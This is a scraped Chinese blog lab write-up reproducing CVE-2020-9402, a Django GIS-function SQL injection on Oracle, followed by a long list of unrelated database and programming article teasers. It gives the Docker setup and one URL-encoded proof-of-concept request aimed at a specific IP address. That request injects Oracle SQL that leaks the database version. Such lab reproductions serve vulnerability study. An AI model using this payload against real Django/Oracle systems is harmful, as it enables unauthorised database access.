blackK_YC
blackK_YC

Oracle SQL 注入上的 Django GIS 函数和聚合漏洞 (CVE-2020-9402)

漏洞描述

Django 于2020年3 月4日发布了一个安全更新,修复了 GIS 函数和聚合中的 SQL 注入漏洞。

参考链接:

  • Django security releases issued: 3.0.4, 2.2.11, and 1.11.29 | Weblog | Django

该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。

 漏洞环境及利用

搭建docker环境

Oracle SQL 注入上的 Django GIS 函数和聚合漏洞 (CVE-2020-9402)_第1张图片

这里遇到一个问题,这个占用空间比较大卡住了,后来查看docker日志才发现

漏洞利用POC

http://139.196.87.102:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

漏洞利用如下

Oracle SQL 注入上的 Django GIS 函数和聚合漏洞 (CVE-2020-9402)_第2张图片

你可能感兴趣的:(sql,django,sqlite)

  • 微服务与docker 当归1024 docker微服务docker架构
    准备工作在课前资料中给大家提供了黑马商城项目的资料,我们需要先导入这个单体项目。不过需要注意的是,本篇及后续的微服务学习都是基于Centos7系统下的Docker部署,因此你必须做好一些准备:Centos7的环境及一个好用的SSH客户端装好Docker会使用Docker如果是学习过上面Docker课程的同学,虚拟机中已经有了黑马商城项目及MySQL数据库了,不过为了跟其他同学保持一致,可以先将整个
  • Mysql-生产环境实战经验总结 猿与禅 MySQL底层原理及实战mysql数据库生产环境经验故障排查压测
    文章目录真实生产环境下的Mysql数据库机器配置如何规划互联网公司的生产环境数据库是如何进行性能压测1.准备测试环境2.构建测试场景3.性能测试4.监控与分析5.资源压力测试6.故障恢复测试7.文档记录与复盘8.安全与合规注意事项如何为生产环境中的数据库部署监控系统1.选择监控工具2.安装监控组件3.配置MySQL导出器4.配置Prometheus5.配置Grafana6.设置警报规则7.监控My
  • uniapps使用HTML5的io模块拷贝文件目录 PABL01 前端html5uniappsqlite
    最近在集成sqlite到uniapp的过程中,因为要将sqlite数据库预加载,所以需要使用HTML5的plus.io模块。使用过程中遇到了许多问题,比如文件路径总是解析不到等。尤其是应用私有文档目录’_doc’。根据官方文档:为了安全管理应用的资源目录,规范对文件系统的操作,5+API在系统应用目录的基础设计了应用沙盒目录,分为私有目录和公共目录两种类型,私有目录仅应用自身可以访问,公共目录在多
  • MySQL高可用性的守护者:主从复制的深度解析与实践指南 墨夶 数据库学习资料1mysqladb数据库
    在当今瞬息万变的数据驱动世界中,确保数据库系统的高可用性和数据一致性是每个企业IT架构师面临的重大挑战。对于依赖MySQL作为核心存储引擎的企业来说,如何构建一个稳定、可靠且易于维护的数据库集群至关重要。今天,我们将深入探讨MySQL主从复制技术,它是实现高可用性架构的关键组件之一。通过本文,您将不仅了解到主从复制的基本原理和配置方法,还将掌握如何优化性能、解决常见问题以及应对故障转移等高级技巧。
  • 为什么是B+树?【深度解读】 UPUP小亮 b树数据结构
    文章目录前言一、怎样的索引的数据结构是好的二、二分查找特点缺点三、二分查找树特点缺点四、自平衡二叉树特点缺点五、B树特点缺点六、B+树定义单点查询插入与删除效率范围查询总结七、MySQL的B+树InnoDB是如何存储数据的B+树是如何进行查询的聚簇索引和二级索引八、总结前言B+树是一种常用的索引数据结构,在数据库系统和文件系统中广泛应用。它相比于其他数据结构具有许多优点,下面我将一步一步介绍相关概
  • SQLmap 自动注入 -02 shenghuiping2001 网络安全sqlmapsql注入webmysql
    1:如果想获得SQL数据库的信息,可以加入参数:-dbssqlmap-u"http://192.168.56.133/mutillidae/index.php?page=user-info.php&username=xiaosheng&password=abc&user-info-php-submit-button=View+Account+Details"--batch-pusername-db
  • 22_设计方案(第四章) 珞圻-Health 信息化项目验收文档体系oracle数据库政务大数据
    4“一中心”设计“一中心”,即建设全区统一的不动产登记数据库,集成全区5个市22个县(区)的不动产登记数据,进行统一的数据存储、管理与应用。(1)市三区业务数据迁移对市三区的业务数据迁移到全区不动产登记数据库,现有市三区的业务数据存储在Oracle数据库中,而全区不动产登记数据统一存储在SQLServer数据库,因此,本项目需将现有Oracle数据库中的255万条业务数据的数据形式转换为SQLSe
  • SQL进阶——JOIN操作详解 m0_74825656 面试学习路线阿里巴巴sql数据库oracle
    在数据库设计中,数据通常存储在多个表中。为了从这些表中获取相关的信息,我们需要使用JOIN操作。JOIN操作允许我们通过某种关系(如相同的列)将多张表的数据结合起来。它是SQL中非常重要的操作,广泛应用于实际开发中。本章节将深入讲解SQL中的各种JOIN类型,并通过大量示例展示如何在实际应用中使用这些连接操作,特别是在C++与SQL数据库连接的场景下。1.内连接(INNERJOIN)、左连接(LE
  • MySQL为什么使用B+树而不是跳表? 衣衣困 mysqlb树数据库
    B+树的设计能够减少磁盘I/O操作,通过一次磁盘读取获取尽可能多的数据。跳表搜索级别越高,IO的操作越多。MySQL使用B+树而不是跳表主要有以下几个原因:1.磁盘读取效率B+树的设计非常适合磁盘存储。B+树的节点包含多个键值对,每个节点的大小通常与磁盘块的大小相匹配,这样可以最大化磁盘读写效率。当进行范围查询时,B+树的叶子节点是顺序链接的,可以顺序读取磁盘块,减少磁盘I/O操作。2.范围查询性
  • mybatis学习(14/134) 一缕叶 mybatismybatis学习
    packagecom.power.mybatsi.test;importorg.apache.ibatis.io.Resources;importorg.apache.ibatis.session.SqlSession;importorg.apache.ibatis.session.SqlSessionFactory;importorg.apache.ibatis.session.SqlSessi
  • mybatis学习(7/134) 一缕叶 学习
    简单了解了一下maven,https://chatgpt.com/share/678bb629-bb4c-800c-8f3b-a41d298e5467,xml还是比较方便的,对于部署或者打包之类的,只需要配置对应的代码,idea会自动到对应的中央库中下载,还可以从国内的镜像去下载,mybatis需要配置对应的mysql-connetion-java,但是版本不要需要与sql的版本相同,我今天以为需
  • Yearning开源MySQL SQL审核平台 boonya #开源观察#安全与运维开源mysql数据库
    一款MYSQLSQL语句/查询审计工具,为DBA与开发人员使用.本地部署,注重隐私,简单高效的MYSQL审计平台。它可以通过流程审批,实现真实线上环境sql的审核和执行,还可以回滚执行,能够确保线上SQL更新的可靠性。资源获取官网:YearningSQL审核平台Gitee:Yearning:YearningMysqlSQL审核平台Github:https://github.com/cookieY/
  • B树和B+树的区别?为什么MySQL 使用B+树? LPoint809 b树mysql数据结构
    B树和B+树的区别?为什么MySQL使用B+树?B树的特点:节点排序,叶子节点存储了数据叶节点具有相同的深度、叶子节点的指针为空一个节点可以存储多个元素,并且多个元素都按照从左到右递增排序,所有索引元素不重复B+树的特点:非叶子节点不存储数据、只存储索引,可以放更多的索引在所有的叶子节点中增加了下一个叶子节点的指针非叶子节点上的元素在叶子节点上都冗余了,也就是叶子结点存储了所有的元素并且都排好了序
  • 【GreatSQL优化器-09】make_join_query_block 数据库mysql
    【GreatSQL优化器-09】make_join_query_block一、make_join_query_block介绍GreatSQL优化器对于多张表join的连接顺序在前面的章节介绍过的best_access_path函数已经执行了,接着就是把where条件进行切割然后推给合适的表。这个过程就是由函数make_join_query_block来执行的。下面用几个简单的例子来说明join连接
  • GreatSQL temp文件占用时长分析 数据库mysql
    GreatSQLtemp文件占用时长分析GreatSQLDBA在日常工作中可能会遇到这种情况,存在一个InnoDB引擎下的temp_x.ibt文件很大,但是却无法确定这个文件是什么时间由哪个连接建立的,难以支撑后续定位问题,今天这篇文章彻底讲明白这个问题。现象:发现一个实例下面(4406端口对外提供服务的实例)temp文件很大,如下所示:-rw-r-----1greatsqlgreatsql819
  • Mysql:关于查询的那些事儿 mysql
    Mysql一直都是互联网开发之中常用的的一门语言,其中查询更是常用的功能之一,今天就来说说关于查询的那些事儿。SELECT是sql中的关键字之一,sql中的关键字还有INSERT、DELETE、UPDATE等关键字,在这篇文章中,我们只要讲讲关于SELECT的部分;SELECT查询的基础语法查询表中所有列的数据SELECT*FROMtable也可以查询表中一个或者多个列的数据,在列明之间用逗号,分
  • MySQL为什么使用B+树?B+树和B树的区别 Cider瞳 读研的日常拾光mysqlb树b+树面试c++golang后端
    MySQL为什么使用B+树?B+树和B树的区别在数据库系统中,索引是提高数据检索效率的关键技术。MySQL默认使用B+树作为索引的数据结构,而不是B树或其他数据结构。这是因为B+树在范围查询、磁盘I/O效率以及数据存储方式等方面具有显著优势。B+树和B树的区别B+树和B树都是平衡多路搜索树,但它们在设计上有一些关键差异,这些差异直接影响了它们在数据库中的应用。1.数据存储位置B树:每个节点(包括非
  • 【GreatSQL优化器-02】索引和Sargable谓词 数据库mysql
    【GreatSQL优化器-02】索引和Sargable谓词一、Sargable谓词介绍GreatSQL的优化器在有过滤条件的时候,需要先把条件按照是否有索引来进行区分,可以用索引来加速查询的条件称为Sargable,其中arge来源于SearchArgument(搜索参数)的首字母拼成的"SARG"。GreatSQL用keyuse_array索引数组和Sargables数组来储存Sargable谓
  • 5.7 涓� 8.0 瀵圭浉鍚屾枃浠剁殑 LOAD DATA 璇彞缁撴灉涓嶅悓 鏁版嵁搴�/a>mysql
    5.7涓�8.0瀵圭浉鍚屾枃浠剁殑LOADDATA璇彞缁撴灉涓嶅悓闂鎻忚堪鏌愬鎴风幇鍦烘敮鎸侊紝鐢盡ySQL5.7.21鍗囩骇MySQL8.0.25鍚庯紝閫氳繃LOADDATA瀵煎叆鏂囦欢锛屽綋鍚屼竴浼氳瘽杩炵画瀵煎叆涓嶅悓鐨勭紪鐮侊紙UTF8/GB18030锛夋枃浠舵椂浼氬嚭鐜颁贡鐮併�傛暟鎹簱鐗堟湰鏈崌绾т箣鍓嶏紝鐩稿悓鐨勫鍏ユ搷浣滃湪MySQL5.7.21鏈嚭鐜颁贡鐮併��/
  • 【GreatSQL优化器-01】const_table 数据库mysql
    【GreatSQL优化器-01】const_table一、const_table介绍GreatSQL的优化器主要用JOIN类来进行处理SQL语句的,JOIN类有以下四个table数量相关的成员变量。其中const_tables是optimize最开始就检查并且标识的,因为这样可以把记录最少的表放在执行计划的第一步,在后面的执行计划里面这些consttables是不参与循环遍历和计算的,因此可以减少
  • 数据迁移丨借助 pg2mysql 从 PostgreSQL 到 GreatSQL 数据库mysql
    数据迁移丨借助pg2mysql从PostgreSQL到GreatSQL上篇《数据迁移丨借助AI从PostgreSQL到GreatSQL》介绍了如何使用AI+pg_dump/COPY的方式将PostgreSQL迁移到GreatSQL中,各位同学看过之后,会发现两款数据库还是有一些差异,例如对象层次结构、数据类型等方面,如果采用人工来迁移,还是会比较麻烦,所以本篇将介绍,如何使用开源工具pg2mysq
  • python 架构简介(转) weixin_34367845 python数据库
    前言:开发语言python越来越火,作为开发比较火的语言,python对网页等的支持也很好,当你想用python来写网页的时候你就要选择框架了。到底要选择呢什么样子的框架,最适合你的项目能力。介绍:Django:PythonWeb应用开发框架Django应该是最出名的Python框架,GAE甚至Erlang都有框架受它影响。Django是走大而全的方向,它最出名的是其全自动化的管理后台:只需要使用
  • Mysql面试题----MyISAM和InnoDB的区别 指尖下的技术 Java面试题mysql数据库
    数据存储结构MyISAM:将表数据和索引分开存储,数据文件和索引文件分别以.MYD和.MYI为扩展名。数据文件按照记录插入的顺序存储,索引文件则是B+树结构,叶子节点存储的是数据记录的物理地址。InnoDB:采用聚集索引的方式存储数据,将数据和索引存储在同一个文件中,通常以.ibd为扩展名。表数据按照主键的顺序存储在聚簇索引的叶子节点中,如果没有显式定义主键,InnoDB会选择一个唯一的非空索引作
  • 【Python】FastAPI之SQLAlchemy、关联关系 道友老李 Pythonpythonfastapi开发语言
    文章目录第四节:SQLAlchemy操作数据库一、SQLAlchemy介绍主要特性更多功能二、创建ORM映射三、增删改查操作1、建立session链接2、新增操作3、查、改和删除操作第五节:SQLAlchemy的关联一、ORM中的一对多/多对一二、自关联三、一对一关联四、多对多关联第四节:SQLAlchemy操作数据库一、SQLAlchemy介绍SQLAlchemy是一个功能强大且灵活的Pytho
  • Python框架-Flask flylr^ Pythonflaskpython后端
    1.Flask介绍Flask作为主流的框架之一,是每个程序员必不可少掌握的,使用python语言基于Werkzeug工具箱编写的轻量级Web开发框架;本身相当于一个内核,其他几乎所有的功能都要用到扩展;核心在于Werkzeug(路由模块),Jinja2模板引擎。相比于django,flask比较轻,轻不代表它的功能不够强大,而是它拥有丰富的扩展,依赖于扩展给应用添加功能2.环境搭建1.安装Flas
  • Python执行MYSQL SQL文件 雪靡 pythonmysqlsql数据库
    很多情况下我们需要Python来执行SQL文件,但是一般库没有提供这些功能,直接执行经常会出错,这里分析各种情况下执行SQL语句的处理。如果你没有时间的话,直接跳转查看[第三点](#3.包含DELIMITER的语句)。准备工作这里采用**mysql-connector连接MySQL,如果还没有安装可以使用pip命令来安装mysql-connector**:pipinstallmysql-conne
  • SQL拆分字段内容(含分隔符) m0_74824635 sql数据库java
    问题描述:在做数据迁移的过程中,我们希望对表中的某个字段根据分隔符进行拆分,得到多条数据,原代码有点意思,因此记录一下。我们假设某条数据如下:IDSTRS1公司名称不能小于四个字,行业类别不能为空,职务/岗位不能为空,公司电话不能小于8位且真是有效针对这条数据,我们希望将其拆分成为四份或者五份,以便于后续的数据处理(这里是拆成四份,加上原来的那条数据一共是五条)。希望得到的结果:STEP1:IDS
  • MySQL 5.7 安装教程(全步骤图解教程) m0_74823364 面试学习路线阿里巴巴资料职业发展mysql数据库后端
    2022年05月30日更新本文介绍的是只安装MySQL数据库的过程,并不包含各种其他附加工具。安装完成之后通常使用Navicat或SQLyog进行可视化操作。清华的镜像网站只保存最新的几个MySQL版本,所以直链可能已经失效,大家可以使用Ctrl+F进行搜索。部分用户在安装时会提示缺少某个C++运行库,下面是其中一个运行库的官方链接,下载x64即可。https://www.microsoft.co
  • Flask:Python 的轻量级 Web 框架 huitu312 pythonflask后端
    Web开发中,Flask是一个非常受欢迎的框架,尤其适用于小型和中型应用的开发。Flask是一个轻量级的框架,它设计得非常简洁且易于使用。与其他全栈框架(如Django)相比,Flask更加灵活,提供开发者更多的自由度,让你根据项目需求自由选择库和工具。本文将介绍Flask框架的基础概念、安装方式、基本用法,以及如何开始使用它构建Web应用。为什么选择Flask?Flask的主要特点是简单和灵活,
  • Databend 特性系列(1)|Databend 数据生命周期 Databend 数据库java开发语言
    Databend是一个使用Rust研发、开源、完全面向云架构的新式数仓,提供极速的弹性扩展能力,致力于打造按需、按量的DataCloud产品体验。具备以下特点:开源CloudDataWarehouse明星项目VectorizedExecution和Pull&Push-BasedProcessorModel真正的存储、计算分离架构,高性能、低成本,按需按量使用完整的数据库支持,兼容MySQL,Cli
  • LeetCode[Math] - #66 Plus One Cwind javaLeetCode题解AlgorithmMath
    原题链接:#66 Plus One   要求: 给定一个用数字数组表示的非负整数,如num1 = {1, 2, 3, 9}, num2 = {9, 9}等,给这个数加上1。 注意: 1. 数字的较高位存在数组的头上,即num1表示数字1239 2. 每一位(数组中的每个元素)的取值范围为0~9   难度:简单   分析: 题目比较简单,只须从数组
  • JQuery中$.ajax()方法参数详解 AILIKES JavaScriptjsonpjqueryAjaxjson
    url: 要求为String类型的参数,(默认为当前页地址)发送请求的地址。 type: 要求为String类型的参数,请求方式(post或get)默认为get。注意其他http请求方法,例如put和    delete也可以使用,但仅部分浏览器支持。 timeout: 要求为Number类型的参数,设置请求超时时间(毫秒)。此设置将覆盖$.ajaxSetup()方法的全局
  • JConsole & JVisualVM远程监视Webphere服务器JVM Kai_Ge JVisualVMJConsoleWebphere
        JConsole是JDK里自带的一个工具,可以监测Java程序运行时所有对象的申请、释放等动作,将内存管理的所有信息进行统计、分析、可视化。我们可以根据这些信息判断程序是否有内存泄漏问题。   使用JConsole工具来分析WAS的JVM问题,需要进行相关的配置。   首先我们看WAS服务器端的配置.   1、登录was控制台https://10.4.119.18
  • 自定义annotation 120153216 annotation
    Java annotation 自定义注释@interface的用法 一、什么是注释      说起注释,得先提一提什么是元数据(metadata)。所谓元数据就是数据的数据。也就是说,元数据是描述数据的。就象数据表中的字段一样,每个字段描述了这个字段下的数据的含义。而J2SE5.0中提供的注释就是java源代码的元数据,也就是说注释是描述java源
  • CentOS 5/6.X 使用 EPEL YUM源 2002wmj centos
    CentOS 6.X 安装使用EPEL YUM源1. 查看操作系统版本[root@node1 ~]# uname -a Linux node1.test.com 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux [root@node1 ~]#
  • 在SQLSERVER中查找缺失和无用的索引SQL 357029540 SQL Server
    --缺失的索引 SELECT  avg_total_user_cost * avg_user_impact * ( user_scans + user_seeks ) AS PossibleImprovement ,          last_user_seek ,    
  • Spring3 MVC 笔记(二) —json+rest优化 7454103 Spring3 MVC
    接上次的 spring mvc 注解的一些详细信息!                          其实也是一些个人的学习笔记  呵呵!
  • 替换“\”的时候报错Unexpected internal error near index 1 \ ^ adminjun java“\替换”
    发现还是有些东西没有刻子脑子里,,过段时间就没什么概念了,所以贴出来...以免再忘...   在拆分字符串时遇到通过 \ 来拆分,可是用所以想通过转义 \\ 来拆分的时候会报异常   public class Main {          /*
  • POJ 1035 Spell checker(哈希表) aijuans 暴力求解--哈希表
    /* 题意:输入字典,然后输入单词,判断字典中是否出现过该单词,或者是否进行删除、添加、替换操作,如果是,则输出对应的字典中的单词 要求按照输入时候的排名输出 题解:建立两个哈希表。一个存储字典和输入字典中单词的排名,一个进行最后输出的判重 */ #include <iostream> //#define using namespace std; const int HASH =
  • 通过原型实现javascript Array的去重、最大值和最小值 ayaoxinchao JavaScriptarrayprototype
    用原型函数(prototype)可以定义一些很方便的自定义函数,实现各种自定义功能。本次主要是实现了Array的去重、获取最大值和最小值。 实现代码如下:   <script type="text/javascript"> Array.prototype.unique = function() { var a = {}; var le
  • UIWebView实现https双向认证请求 bewithme UIWebViewhttpsObjective-C
              什么是HTTPS双向认证我已在先前的博文 ASIHTTPRequest实现https双向认证请求 中有讲述,不理解的读者可以先复习一下。本文是用UIWebView来实现对需要客户端证书验证的服务请求,网上有些文章中有涉及到此内容,但都只言片语,没有讲完全,更没有完整的代码,让人困扰不已。但是此知
  • NoSQL数据库之Redis数据库管理(Redis高级应用之事务处理、持久化操作、pub_sub、虚拟内存) bijian1013 redis数据库NoSQL
    3.事务处理         Redis对事务的支持目前不比较简单。Redis只能保证一个client发起的事务中的命令可以连续的执行,而中间不会插入其他client的命令。当一个client在一个连接中发出multi命令时,这个连接会进入一个事务上下文,该连接后续的命令不会立即执行,而是先放到一个队列中,当执行exec命令时,redis会顺序的执行队列中
  • 各数据库分页sql备忘 bingyingao oraclesql分页
    ORACLE 下面这个效率很低 SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (SELECT * FROM IPAY_RCD_FS_RETURN order by id desc) A ) WHERE RN <20; 下面这个效率很高 SELECT A.*, ROWNUM RN FROM (SELECT * FROM IPAY_RCD_
  • 【Scala七】Scala核心一:函数 bit1129 scala
    1. 如果函数体只有一行代码,则可以不用写{},比如 def print(x: Int) = println(x) 一行上的多条语句用分号隔开,则只有第一句属于方法体,例如   def printWithValue(x: Int) : String= println(x); "ABC"   上面的代码报错,因为,printWithValue的方法
  • 了解GHC的factorial编译过程 bookjovi haskell
    GHC相对其他主流语言的编译器或解释器还是比较复杂的,一部分原因是haskell本身的设计就不易于实现compiler,如lazy特性,static typed,类型推导等。 关于GHC的内部实现有篇文章说的挺好,这里,文中在RTS一节中详细说了haskell的concurrent实现,里面提到了green thread,如果熟悉Go语言的话就会发现,ghc的concurrent实现和Go有点类
  • Java-Collections Framework学习与总结-LinkedHashMap BrokenDreams LinkedHashMap
            前面总结了java.util.HashMap,了解了其内部由散列表实现,每个桶内是一个单向链表。那有没有双向链表的实现呢?双向链表的实现会具备什么特性呢?来看一下HashMap的一个子类——java.util.LinkedHashMap。       
  • 读《研磨设计模式》-代码笔记-抽象工厂模式-Abstract Factory bylijinnan abstract
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * Abstract Factory Pattern * 抽象工厂模式的目的是: * 通过在抽象工厂里面定义一组产品接口,方便地切换“产品簇” * 这些接口是相关或者相依赖的
  • 压暗面部高光 cherishLC PS
    方法一、压暗高光&重新着色 当皮肤很油又使用闪光灯时,很容易在面部形成高光区域。 下面讲一下我今天处理高光区域的心得: 皮肤可以分为纹理和色彩两个属性。其中纹理主要由亮度通道(Lab模式的L通道)决定,色彩则由a、b通道确定。 处理思路为在保持高光区域纹理的情况下,对高光区域着色。具体步骤为:降低高光区域的整体的亮度,再进行着色。 如果想简化步骤,可以只进行着色(参看下面的步骤1
  • Java VisualVM监控远程JVM crabdave visualvm
    Java VisualVM监控远程JVM    JDK1.6开始自带的VisualVM就是不错的监控工具. 这个工具就在JAVA_HOME\bin\目录下的jvisualvm.exe, 双击这个文件就能看到界面   通过JMX连接远程机器, 需要经过下面的配置: 1. 修改远程机器JDK配置文件 (我这里远程机器是linux).    
  • Saiku去掉登录模块 daizj saiku登录olapBI
    1、修改applicationContext-saiku-webapp.xml <security:intercept-url pattern="/rest/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />  <security:intercept-url pattern=&qu
  • 浅析 Flex中的Focus dsjt htmlFlexFlash
    关键字:focus、 setFocus、 IFocusManager、KeyboardEvent 焦点、设置焦点、获得焦点、键盘事件 一、无焦点的困扰——组件监听不到键盘事件 原因:只有获得焦点的组件(确切说是InteractiveObject)才能监听到键盘事件的目标阶段;键盘事件(flash.events.KeyboardEvent)参与冒泡阶段,所以焦点组件的父项(以及它爸
  • Yii全局函数使用 dcj3sjt126com yii
    由于YII致力于完美的整合第三方库,它并没有定义任何全局函数。yii中的每一个应用都需要全类别和对象范围。例如,Yii::app()->user;Yii::app()->params['name'];等等。我们可以自行设定全局函数,使得代码看起来更加简洁易用。(原文地址) 我们可以保存在globals.php在protected目录下。然后,在入口脚本index.php的,我们包括在
  • 设计模式之单例模式二(解决无序写入的问题) come_for_dream 单例模式volatile乱序执行双重检验锁
                    在上篇文章中我们使用了双重检验锁的方式避免懒汉式单例模式下由于多线程造成的实例被多次创建的问题,但是因为由于JVM为了使得处理器内部的运算单元能充分利用,处理器可能会对输入代码进行乱序执行(Out Of Order Execute)优化,处理器会在计算之后将乱序执行的结果进行重组,保证该
  • 程序员从初级到高级的蜕变 gcq511120594 框架工作PHPandroidhtml5
    软件开发是一个奇怪的行业,市场远远供不应求。这是一个已经存在多年的问题,而且随着时间的流逝,愈演愈烈。 我们严重缺乏能够满足需求的人才。这个行业相当年轻。大多数软件项目是失败的。几乎所有的项目都会超出预算。我们解决问题的最佳指导方针可以归结为——“用一些通用方法去解决问题,当然这些方法常常不管用,于是,唯一能做的就是不断地尝试,逐个看看是否奏效”。 现在我们把淫浸代码时间超过3年的开发人员称为
  • Reverse Linked List hcx2013 list
    Reverse a singly linked list.   /** * Definition for singly-linked list. * public class ListNode { * int val; * ListNode next; * ListNode(int x) { val = x; } * } */ p
  • Spring4.1新特性——数据库集成测试 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • C# Ajax上传图片同时生成微缩图(附Demo) liyonghui160com
        1.Ajax无刷新上传图片,详情请阅我的这篇文章。(jquery + c# ashx)         2.C#位图处理  System.Drawing。         3.最新demo支持IE7,IE8,Fir
  • Java list三种遍历方法性能比较 pda158 java
    从c/c++语言转向java开发,学习java语言list遍历的三种方法,顺便测试各种遍历方法的性能,测试方法为在ArrayList中插入1千万条记录,然后遍历ArrayList,发现了一个奇怪的现象,测试代码例如以下: package com.hisense.tiger.list; import java.util.ArrayList; import java.util.Iterator;
  • 300个涵盖IT各方面的免费资源(上)——商业与市场篇 shoothao seo商业与市场IT资源免费资源
    A.网站模板+logo+服务器主机+发票生成 HTML5 UP:响应式的HTML5和CSS3网站模板。 Bootswatch:免费的Bootstrap主题。 Templated:收集了845个免费的CSS和HTML5网站模板。 Wordpress.org|Wordpress.com:可免费创建你的新网站。 Strikingly:关注领域中免费无限的移动优
  • localStorage、sessionStorage uule localStorage
    W3School 例子   HTML5 提供了两种在客户端存储数据的新方法: localStorage - 没有时间限制的数据存储 sessionStorage - 针对一个 session 的数据存储   之前,这些都是由 cookie 完成的。但是 cookie 不适合大量数据的存储,因为它们由每个对服务器的请求来传递,这使得 cookie 速度很慢而且效率也不
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他